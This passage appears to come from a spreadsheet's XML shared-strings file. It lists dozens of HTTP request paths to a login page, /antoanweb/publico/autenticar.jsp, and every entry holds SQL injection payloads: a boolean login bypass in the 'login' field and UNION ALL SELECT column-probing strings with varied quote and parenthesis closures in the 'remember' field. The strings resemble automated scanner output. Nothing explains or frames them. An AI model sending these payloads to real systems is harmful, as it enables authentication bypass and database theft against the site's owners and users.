    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect4482,4482,4482,4482,4482,4482,4482,4482,4482,4482,4482,4482,4482,4482,4482,4482,4482,4482,4482,4482,4482,4482,4482,4482,4482,4482,4482,4482,4482,4482,4482,4482,4482,4482#and'dupz'='dupz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166,4166#and'vjgx'='vjgx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect1159,1159,1159,1159,1159,1159,1159,1159,1159,1159,1159,1159,1159,1159,1159,1159,1159,1159,1159,1159,1159,1159,1159,1159,1159,1159,1159,1159,1159,1159,1159,1159,1159,1159,1159,1159#and'yofr'='yofr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect1383,1383,1383,1383,1383,1383,1383,1383,1383,1383,1383,1383,1383,1383,1383,1383,1383,1383,1383,1383,1383,1383,1383,1383,1383,1383,1383,1383,1383,1383,1383,1383,1383,1383,1383,1383,1383#and'kzfp'='kzfp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect8865,8865,8865,8865,8865,8865,8865,8865,8865,8865,8865,8865,8865,8865,8865,8865,8865,8865,8865,8865,8865,8865,8865,8865,8865,8865,8865,8865,8865,8865,8865,8865,8865,8865,8865,8865,8865,8865#and'rhrd'='rhrd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect5556,5556,5556,5556,5556,5556,5556,5556,5556,5556,5556,5556,5556,5556,5556,5556,5556,5556,5556,5556,5556,5556,5556,5556,5556,5556,5556,5556,5556,5556,5556,5556,5556,5556,5556,5556,5556,5556,5556#and'fqpq'='fqpq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100,100#and'uxme'='uxme&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195,195#and('mthc'like'mthc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect958,958,958,958,958,958,958,958,958,958,958,958,958,958,958,958,958,958,958,958,958,958,958,958,958,958,958,958,958,958,958,958#and('kxxf'like'kxxf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect7069,7069,7069,7069,7069,7069,7069,7069,7069,7069,7069,7069,7069,7069,7069,7069,7069,7069,7069,7069,7069,7069,7069,7069,7069,7069,7069,7069,7069,7069,7069,7069,7069#and('ther'like'ther&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect2740,2740,2740,2740,2740,2740,2740,2740,2740,2740,2740,2740,2740,2740,2740,2740,2740,2740,2740,2740,2740,2740,2740,2740,2740,2740,2740,2740,2740,2740,2740,2740,2740,2740#and('bpbi'like'bpbi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247#and('ayae'like'ayae&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect5132,5132,5132,5132,5132,5132,5132,5132,5132,5132,5132,5132,5132,5132,5132,5132,5132,5132,5132,5132,5132,5132,5132,5132,5132,5132,5132,5132,5132,5132,5132,5132,5132,5132,5132,5132#and('oarn'like'oarn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect7254,7254,7254,7254,7254,7254,7254,7254,7254,7254,7254,7254,7254,7254,7254,7254,7254,7254,7254,7254,7254,7254,7254,7254,7254,7254,7254,7254,7254,7254,7254,7254,7254,7254,7254,7254,7254#and('wgiy'like'wgiy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect1794,1794,1794,1794,1794,1794,1794,1794,1794,1794,1794,1794,1794,1794,1794,1794,1794,1794,1794,1794,1794,1794,1794,1794,1794,1794,1794,1794,1794,1794,1794,1794,1794,1794,1794,1794,1794,1794#and('fzik'like'fzik&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect1685,1685,1685,1685,1685,1685,1685,1685,1685,1685,1685,1685,1685,1685,1685,1685,1685,1685,1685,1685,1685,1685,1685,1685,1685,1685,1685,1685,1685,1685,1685,1685,1685,1685,1685,1685,1685,1685,1685#and('krkv'like'krkv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect9931,9931,9931,9931,9931,9931,9931,9931,9931,9931,9931,9931,9931,9931,9931,9931,9931,9931,9931,9931,9931,9931,9931,9931,9931,9931,9931,9931,9931,9931,9931,9931,9931,9931,9931,9931,9931,9931,9931,9931#and('uhhm'like'uhhm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646,5646#and(('qtvm'like'qtvm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect8254,8254,8254,8254,8254,8254,8254,8254,8254,8254,8254,8254,8254,8254,8254,8254,8254,8254,8254,8254,8254,8254,8254,8254,8254,8254,8254,8254,8254,8254,8254,8254#and(('yjdq'like'yjdq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect6323,6323,6323,6323,6323,6323,6323,6323,6323,6323,6323,6323,6323,6323,6323,6323,6323,6323,6323,6323,6323,6323,6323,6323,6323,6323,6323,6323,6323,6323,6323,6323,6323#and(('vjxd'like'vjxd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect6415,6415,6415,6415,6415,6415,6415,6415,6415,6415,6415,6415,6415,6415,6415,6415,6415,6415,6415,6415,6415,6415,6415,6415,6415,6415,6415,6415,6415,6415,6415,6415,6415,6415#and(('hpwo'like'hpwo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect1755,1755,1755,1755,1755,1755,1755,1755,1755,1755,1755,1755,1755,1755,1755,1755,1755,1755,1755,1755,1755,1755,1755,1755,1755,1755,1755,1755,1755,1755,1755,1755,1755,1755,1755#and(('arvn'like'arvn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect1933,1933,1933,1933,1933,1933,1933,1933,1933,1933,1933,1933,1933,1933,1933,1933,1933,1933,1933,1933,1933,1933,1933,1933,1933,1933,1933,1933,1933,1933,1933,1933,1933,1933,1933,1933#and(('xrii'like'xrii&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510,4510#and(('rkiu'like'rkiu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650#and(('icwz'like'icwz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect1084,1084,1084,1084,1084,1084,1084,1084,1084,1084,1084,1084,1084,1084,1084,1084,1084,1084,1084,1084,1084,1084,1084,1084,1084,1084,1084,1084,1084,1084,1084,1084,1084,1084,1084,1084,1084,1084,1084#and(('wpof'like'wpof&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect2277,2277,2277,2277,2277,2277,2277,2277,2277,2277,2277,2277,2277,2277,2277,2277,2277,2277,2277,2277,2277,2277,2277,2277,2277,2277,2277,2277,2277,2277,2277,2277,2277,2277,2277,2277,2277,2277,2277,2277#and(('axqr'like'axqr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect7984,7984,7984,7984,7984,7984,7984,7984,7984,7984,7984,7984,7984,7984,7984,7984,7984,7984,7984,7984,7984,7984,7984,7984,7984,7984,7984,7984,7984,7984,7984#and((('qkmb'like'qkmb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604,1604#and((('pgyx'like'pgyx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect9830,9830,9830,9830,9830,9830,9830,9830,9830,9830,9830,9830,9830,9830,9830,9830,9830,9830,9830,9830,9830,9830,9830,9830,9830,9830,9830,9830,9830,9830,9830,9830,9830#and((('btny'like'btny&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect7104,7104,7104,7104,7104,7104,7104,7104,7104,7104,7104,7104,7104,7104,7104,7104,7104,7104,7104,7104,7104,7104,7104,7104,7104,7104,7104,7104,7104,7104,7104,7104,7104,7104#and((('awow'like'awow&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect1958,1958,1958,1958,1958,1958,1958,1958,1958,1958,1958,1958,1958,1958,1958,1958,1958,1958,1958,1958,1958,1958,1958,1958,1958,1958,1958,1958,1958,1958,1958,1958,1958,1958,1958#and((('yxud'like'yxud&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682,4682#and((('ailk'like'ailk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect9083,9083,9083,9083,9083,9083,9083,9083,9083,9083,9083,9083,9083,9083,9083,9083,9083,9083,9083,9083,9083,9083,9083,9083,9083,9083,9083,9083,9083,9083,9083,9083,9083,9083,9083,9083,9083#and((('fwkd'like'fwkd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect8294,8294,8294,8294,8294,8294,8294,8294,8294,8294,8294,8294,8294,8294,8294,8294,8294,8294,8294,8294,8294,8294,8294,8294,8294,8294,8294,8294,8294,8294,8294,8294,8294,8294,8294,8294,8294,8294#and((('kfmg'like'kfmg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect7166,7166,7166,7166,7166,7166,7166,7166,7166,7166,7166,7166,7166,7166,7166,7166,7166,7166,7166,7166,7166,7166,7166,7166,7166,7166,7166,7166,7166,7166,7166,7166,7166,7166,7166,7166,7166,7166,7166#and((('hefb'like'hefb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect7856,7856,7856,7856,7856,7856,7856,7856,7856,7856,7856,7856,7856,7856,7856,7856,7856,7856,7856,7856,7856,7856,7856,7856,7856,7856,7856,7856,7856,7856,7856,7856,7856,7856,7856,7856,7856,7856,7856,7856#and((('afcs'like'afcs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect8324,8324,8324,8324,8324,8324,8324,8324,8324,8324,8324,8324,8324,8324,8324,8324,8324,8324,8324,8324,8324,8324,8324,8324,8324,8324,8324,8324,8324,8324,8324#and'mtwv'like'mtwv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect4193,4193,4193,4193,4193,4193,4193,4193,4193,4193,4193,4193,4193,4193,4193,4193,4193,4193,4193,4193,4193,4193,4193,4193,4193,4193,4193,4193,4193,4193,4193,4193#and'fcjh'like'fcjh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect6881,6881,6881,6881,6881,6881,6881,6881,6881,6881,6881,6881,6881,6881,6881,6881,6881,6881,6881,6881,6881,6881,6881,6881,6881,6881,6881,6881,6881,6881,6881,6881,6881#and'wayz'like'wayz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969,2969#and'lhee'like'lhee&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301,3301#and'kwgw'like'kwgw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect2355,2355,2355,2355,2355,2355,2355,2355,2355,2355,2355,2355,2355,2355,2355,2355,2355,2355,2355,2355,2355,2355,2355,2355,2355,2355,2355,2355,2355,2355,2355,2355,2355,2355,2355,2355#and'pwvt'like'pwvt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect9356,9356,9356,9356,9356,9356,9356,9356,9356,9356,9356,9356,9356,9356,9356,9356,9356,9356,9356,9356,9356,9356,9356,9356,9356,9356,9356,9356,9356,9356,9356,9356,9356,9356,9356,9356,9356#and'jdho'like'jdho&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect4792,4792,4792,4792,4792,4792,4792,4792,4792,4792,4792,4792,4792,4792,4792,4792,4792,4792,4792,4792,4792,4792,4792,4792,4792,4792,4792,4792,4792,4792,4792,4792,4792,4792,4792,4792,4792,4792#and'xrby'like'xrby&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect2739,2739,2739,2739,2739,2739,2739,2739,2739,2739,2739,2739,2739,2739,2739,2739,2739,2739,2739,2739,2739,2739,2739,2739,2739,2739,2739,2739,2739,2739,2739,2739,2739,2739,2739,2739,2739,2739,2739#and'lcvs'like'lcvs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect7265,7265,7265,7265,7265,7265,7265,7265,7265,7265,7265,7265,7265,7265,7265,7265,7265,7265,7265,7265,7265,7265,7265,7265,7265,7265,7265,7265,7265,7265,7265,7265,7265,7265,7265,7265,7265,7265,7265,7265#and'ospx'like'ospx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect7140,7140,7140,7140,7140,7140,7140,7140,7140,7140,7140,7140,7140,7140,7140,7140,7140,7140,7140,7140,7140,7140,7140,7140,7140,7140,7140,7140,7140,7140,7140#and("kpvh"="kpvh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect2193,2193,2193,2193,2193,2193,2193,2193,2193,2193,2193,2193,2193,2193,2193,2193,2193,2193,2193,2193,2193,2193,2193,2193,2193,2193,2193,2193,2193,2193,2193,2193#and("pdsl"="pdsl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect4722,4722,4722,4722,4722,4722,4722,4722,4722,4722,4722,4722,4722,4722,4722,4722,4722,4722,4722,4722,4722,4722,4722,4722,4722,4722,4722,4722,4722,4722,4722,4722,4722#and("tvsl"="tvsl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect1559,1559,1559,1559,1559,1559,1559,1559,1559,1559,1559,1559,1559,1559,1559,1559,1559,1559,1559,1559,1559,1559,1559,1559,1559,1559,1559,1559,1559,1559,1559,1559,1559,1559#and("ewhc"="ewhc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect5504,5504,5504,5504,5504,5504,5504,5504,5504,5504,5504,5504,5504,5504,5504,5504,5504,5504,5504,5504,5504,5504,5504,5504,5504,5504,5504,5504,5504,5504,5504,5504,5504,5504,5504#and("juyw"="juyw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect9553,9553,9553,9553,9553,9553,9553,9553,9553,9553,9553,9553,9553,9553,9553,9553,9553,9553,9553,9553,9553,9553,9553,9553,9553,9553,9553,9553,9553,9553,9553,9553,9553,9553,9553,9553#and("esot"="esot&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520,9520#and("ezii"="ezii&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603,2603#and("oqot"="oqot&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect9515,9515,9515,9515,9515,9515,9515,9515,9515,9515,9515,9515,9515,9515,9515,9515,9515,9515,9515,9515,9515,9515,9515,9515,9515,9515,9515,9515,9515,9515,9515,9515,9515,9515,9515,9515,9515,9515,9515#and("cmpq"="cmpq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect4959,4959,4959,4959,4959,4959,4959,4959,4959,4959,4959,4959,4959,4959,4959,4959,4959,4959,4959,4959,4959,4959,4959,4959,4959,4959,4959,4959,4959,4959,4959,4959,4959,4959,4959,4959,4959,4959,4959,4959#and("ijow"="ijow&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069,8069#and(("ihhl"="ihhl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect9603,9603,9603,9603,9603,9603,9603,9603,9603,9603,9603,9603,9603,9603,9603,9603,9603,9603,9603,9603,9603,9603,9603,9603,9603,9603,9603,9603,9603,9603,9603,9603#and(("clci"="clci&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect3911,3911,3911,3911,3911,3911,3911,3911,3911,3911,3911,3911,3911,3911,3911,3911,3911,3911,3911,3911,3911,3911,3911,3911,3911,3911,3911,3911,3911,3911,3911,3911,3911#and(("qvqc"="qvqc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect266,266,266,266,266,266,266,266,266,266,266,266,266,266,266,266,266,266,266,266,266,266,266,266,266,266,266,266,266,266,266,266,266,266#and(("fgoc"="fgoc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect6852,6852,6852,6852,6852,6852,6852,6852,6852,6852,6852,6852,6852,6852,6852,6852,6852,6852,6852,6852,6852,6852,6852,6852,6852,6852,6852,6852,6852,6852,6852,6852,6852,6852,6852#and(("ibdt"="ibdt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187,187#and(("sxdy"="sxdy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect1294,1294,1294,1294,1294,1294,1294,1294,1294,1294,1294,1294,1294,1294,1294,1294,1294,1294,1294,1294,1294,1294,1294,1294,1294,1294,1294,1294,1294,1294,1294,1294,1294,1294,1294,1294,1294#and(("gwna"="gwna&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect4622,4622,4622,4622,4622,4622,4622,4622,4622,4622,4622,4622,4622,4622,4622,4622,4622,4622,4622,4622,4622,4622,4622,4622,4622,4622,4622,4622,4622,4622,4622,4622,4622,4622,4622,4622,4622,4622#and(("uqxg"="uqxg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect8547,8547,8547,8547,8547,8547,8547,8547,8547,8547,8547,8547,8547,8547,8547,8547,8547,8547,8547,8547,8547,8547,8547,8547,8547,8547,8547,8547,8547,8547,8547,8547,8547,8547,8547,8547,8547,8547,8547#and(("innh"="innh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826,826#and(("fllh"="fllh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect8247,8247,8247,8247,8247,8247,8247,8247,8247,8247,8247,8247,8247,8247,8247,8247,8247,8247,8247,8247,8247,8247,8247,8247,8247,8247,8247,8247,8247,8247,8247#and((("homt"="homt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437,2437#and((("aycd"="aycd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940,7940#and((("rlaa"="rlaa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect8927,8927,8927,8927,8927,8927,8927,8927,8927,8927,8927,8927,8927,8927,8927,8927,8927,8927,8927,8927,8927,8927,8927,8927,8927,8927,8927,8927,8927,8927,8927,8927,8927,8927#and((("sdbf"="sdbf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839,1839#and((("fdgw"="fdgw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect7906,7906,7906,7906,7906,7906,7906,7906,7906,7906,7906,7906,7906,7906,7906,7906,7906,7906,7906,7906,7906,7906,7906,7906,7906,7906,7906,7906,7906,7906,7906,7906,7906,7906,7906,7906#and((("yhvf"="yhvf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect9174,9174,9174,9174,9174,9174,9174,9174,9174,9174,9174,9174,9174,9174,9174,9174,9174,9174,9174,9174,9174,9174,9174,9174,9174,9174,9174,9174,9174,9174,9174,9174,9174,9174,9174,9174,9174#and((("uoci"="uoci&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315,2315#and((("sbdt"="sbdt&amp;modo=entrar</t>
  </si>
  <si>
